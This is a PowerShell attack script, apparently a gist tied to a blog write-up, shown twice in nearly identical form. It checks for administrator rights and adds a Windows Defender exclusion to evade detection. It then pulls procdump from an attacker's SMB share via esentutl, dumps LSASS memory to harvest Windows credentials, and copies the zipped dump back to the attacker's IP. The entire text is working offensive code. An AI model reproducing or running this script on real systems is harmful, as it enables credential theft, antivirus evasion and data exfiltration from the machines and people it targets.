tokyoneon/lsass_exfil.ps1

## lsass_exfil.ps1
# write-up: https://www.varonis.com/blog/author/tokyoneon/

# an if statement to prevent the attack from executing without administrator privileges
if (whoami /groups | findstr /i "S-1-16-12288")
{
	# start the attack as a background processs to prevent the PS terminal from stalling when opened
	Start-Job {
		# where to write data during the attack?
		$temp = "$env:TEMP"

		# create path exclusion in Windows Defender to prevent procdump detection
		Add-MpPreference -ExclusionPath $temp

		# sleep several seconds to allow the path exclusion to take effect
		Start-Sleep -s 4

		# the attacker's IP address
		$server = "192.168.56.101"

		# the attacker's SMB share name, must match impacket-smbserver share name
		$share = "evilshare"

		# procdump filename as it appears on the attacker's SMB share
		$procdump = "procdump.exe"

		# procdump.exe is saved locally with a random string as the filename
		$filename = (-join ((65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object { [char]$_ })) + '.exe'

		# the procdump output path when saved locally; shameless username plug
		$dump = "tokyoneon.dmp"

		# as the procdump output contains non-ascii characters, it must be compressed before exfiltrating
		$exfil = "$env:COMPUTERNAME-$env:USERNAME-lsass.zip"

		# rather than use invoke-webrequest, use an alternate LOLBAS for file retrieval
		esentutl.exe /y \\$server\$share\$procdump /d $temp\$filename /o

		# execute procdump and dump LSASS memory
		& $temp\$filename -accepteula -ma lsass.exe $temp\$dump

		# suppress progress bar that appears in the terminal when compressing the dump
		$ProgressPreference = "SilentlyContinue"

		# compress the dump
		Compress-Archive -Path $temp\$dump -DestinationPath $temp\$exfil -Force

		# exfiltrate the compressed dump to the attacker's SMB share via cp
		cp $temp\$exfil \\$server\$share\$exfil } | Out-Null
}
	# write-up: https://www.varonis.com/blog/author/tokyoneon/

	# an if statement to prevent the attack from executing without administrator privileges
	if (whoami /groups \| findstr /i "S-1-16-12288")
	{
	# start the attack as a background processs to prevent the PS terminal from stalling when opened
	Start-Job {
	# where to write data during the attack?
	$temp = "$env:TEMP"

	# create path exclusion in Windows Defender to prevent procdump detection
	Add-MpPreference -ExclusionPath $temp

	# sleep several seconds to allow the path exclusion to take effect
	Start-Sleep -s 4

	# the attacker's IP address
	$server = "192.168.56.101"

	# the attacker's SMB share name, must match impacket-smbserver share name
	$share = "evilshare"

	# procdump filename as it appears on the attacker's SMB share
	$procdump = "procdump.exe"

	# procdump.exe is saved locally with a random string as the filename
	$filename = (-join ((65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object { [char]$_ })) + '.exe'

	# the procdump output path when saved locally; shameless username plug
	$dump = "tokyoneon.dmp"

	# as the procdump output contains non-ascii characters, it must be compressed before exfiltrating
	$exfil = "$env:COMPUTERNAME-$env:USERNAME-lsass.zip"

	# rather than use invoke-webrequest, use an alternate LOLBAS for file retrieval
	esentutl.exe /y \\$server\$share\$procdump /d $temp\$filename /o

	# execute procdump and dump LSASS memory
	& $temp\$filename -accepteula -ma lsass.exe $temp\$dump

	# suppress progress bar that appears in the terminal when compressing the dump
	$ProgressPreference = "SilentlyContinue"

	# compress the dump
	Compress-Archive -Path $temp\$dump -DestinationPath $temp\$exfil -Force

	# exfiltrate the compressed dump to the attacker's SMB share via cp
	cp $temp\$exfil \\$server\$share\$exfil } \| Out-Null
	}